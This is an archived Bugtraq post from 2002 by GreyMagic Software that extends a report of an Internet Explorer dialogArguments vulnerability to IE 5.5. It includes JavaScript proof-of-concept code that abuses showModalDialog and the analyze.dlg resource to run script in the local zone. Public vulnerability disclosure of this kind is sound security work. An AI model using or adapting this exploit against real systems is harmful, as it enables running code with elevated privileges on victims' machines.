Bugtraq mailing list archives

RE: (MSIE) -"dialogArguments" (extended)

From: "GreyMagic Software" <security () greymagic com>
Date: Wed, 20 Nov 2002 10:55:17 +0200

IFRAME in a page opened by "openModalDialog" has  "dialogArguments" of its
parent.


The method is "showModalDialog" and not "openModalDialog". It's worth noting
that "showModelessDialog" is also vulnerable.

/*note: please tell me if "MSIE SP1" allows an internet page contains an
iframe with local content*/


Normally, it doesn't. But it seems like Microsoft applied that rule to
normal windows and forgot to do the same for dialogs.

in the demo:
(*)"victim zone" is localzone;
(*)the page from victim zone is "res://shdoclc.dll/privacypolicy.dlg"; it
uses "cookieUrl" without filtering.


This vulnerability is very similar to the redirect vulnerability in dialogs
presented by Thor Larholm back in March and it has the same impact. But just
like Larholm's initial advisory was confined to IE 6, Liu's is confined to
IE 6 as well. This is a result of using "privacypolicy.dlg" for
exploitation, which was not shipped prior to version 6.

However, IE 5.5 is also vulnerable, and can be exploited by using the
"analyze.dlg" resource, which we published immediately after Thor's advisory
at the time.

Notice that IE 5.0 is not vulnerable to this flaw at all. It seems like many
of the recent IE vulnerabilities emerge from the global change made to
windows (including frames and iframes) in IE 5.5.

The following proof-of-concept code will work on both (fully patched) IE 5.5
and IE 6:

/*
Online demonstration at
http://security.greymagic.com/misc/globalDgArg/
*/

function oExploit(iSec) {
        return {
                rel:"stylesheet",
                readyState:"exploit",
                href:sHTML
        };
}
oExploit.length=1;

var sHTML="<scr\ipt defer>alert(location.href)</scr\ipt>",
        oSecurity={
                document:{
                        all:{
                                tags:function (sTag) {
                                        return sTag=="link" ? oExploit : [];
                                }
                        }
                }
        }

// base.html contains <iframe src="res://shdoclc.dll/analyze.dlg"></iframe>
showModalDialog("base.html",oSecurity);

Current thread:

(MSIE) when parent gives his son bad things ;) --"dialogArguments " again Liu Die Yu (Nov 19)
- Re: (MSIE) when parent gives his son bad things ;) --"dialogArguments " again Dave Ahmad (Nov 19)
- RE: (MSIE) -"dialogArguments" (extended) GreyMagic Software (Nov 23)